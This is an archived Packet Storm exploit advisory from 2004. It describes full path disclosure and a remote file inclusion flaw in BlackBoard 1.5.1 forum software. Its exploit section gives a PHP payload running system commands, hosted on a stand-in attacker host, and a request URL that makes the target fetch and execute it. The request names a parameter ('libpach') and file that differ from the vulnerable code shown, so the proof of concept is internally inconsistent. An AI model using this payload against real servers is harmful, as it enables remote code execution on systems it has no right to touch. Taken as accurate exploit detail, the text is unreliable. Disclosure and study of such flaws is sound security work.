exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

blackboard.txt

blackboard.txt
Posted Oct 13, 2004
Authored by Cracklove | Site ProxySky.com

BlackBoard version 1.5.1 is susceptible to full path disclosure and remote executable code inclusion.

tags | exploit, remote
SHA-256 | c72ea7662d46ad0335a5869c71c8b2882af16a0a76cb83d531d4f60b91ab113d

blackboard.txt

Change Mirror Download


Multiple vulnerabilities in BlackBoard

**********************************
*AuThor:Cracklove *
*emA!l:Cracklove[at]Gmail[dot]Com*
*HoMePaGe:http://ProxySky.com *
**********************************

[Info]

Website: http://blackboard.unclassified.de
Version: 1.5.1,Maybe prior
Problem: Full path disclosure,Include file

[Vuls]

1.Full path disclosure:

Let's try to request like this:

http://target/bb_lib/checkdb.inc.php

and we get standard error messages like that:

Warning: main(lang/_more.php): failed to open stream: No such file or directory in /www/web002/_blackboard/bb_lib/checkdb.inc.php on line 15

Fatal error: main(): Failed opening required 'lang/_more.php' (include_path='.:/usr/local/lib/php') in /www/web002/_blackboard/bb_lib/checkdb.inc.php on line 15

The Problem also in admin.inc.php,cp.inc.php etc.


2.Include file

Ok let's open ./bb_lib/admin.inc.php,We see

require($libpath . 'lang/' . $LANG . '_more.php');

Bingo!It is include vul!

[Exploit]

For example, if I had access to place files in a webspace http://evilhost.com/,I would create a directory "lang" and place
inside it a script called _more.php with content like the following:

<?
system("uname -a;id;ls -al");
?>

If we then make a request to the target machine like the following:

http://target/bb_lib/checkdb.inc.php?libpach=http://evilhost.com/

The code should be retrieved and executed.

[Fix]

Maybe a patch will release later.

[Greetings]

Greets To Xon,fatb,Envymask,h886,ToToDoDo And to all people in China.
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    23 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close